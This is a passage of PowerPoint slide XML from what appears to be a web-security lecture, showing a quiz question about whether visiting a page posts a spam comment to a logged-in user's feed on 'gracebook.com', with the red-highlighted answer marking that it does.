              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223519" y="3838244"/>
            <a:ext cx="10750127" cy="1348938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="57573" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="456342" indent="-456342">
              <a:spcBef>
                <a:spcPts val="453"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="456342" algn="l"/>
                <a:tab pos="457189" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>happen</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>visits</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the page?</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="6773">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="608738" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a)	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>spam</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>posted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>share</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>feed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>gracebook.com </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-579" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>b)</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="816187" y="4772829"/>
            <a:ext cx="10607887" cy="427532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>spam</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>posted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>share</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>feed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>currently</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833120" y="5170423"/>
            <a:ext cx="4023360" cy="414867"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3017520" h="311150">
                <a:moveTo>
                  <a:pt x="3017520" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2959608" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="310896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2959608" y="310896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3017520" y="310896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3017520" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206586" y="5098878"/>
            <a:ext cx="11312313" cy="916619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="56727" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="626518">
              <a:spcBef>
                <a:spcPts val="447"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>logged</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>gracebook.com</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="327"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="625671" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>c)	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>spam</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> posted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>share</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>feed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>gracebook.com</a:t>
            </a:r>
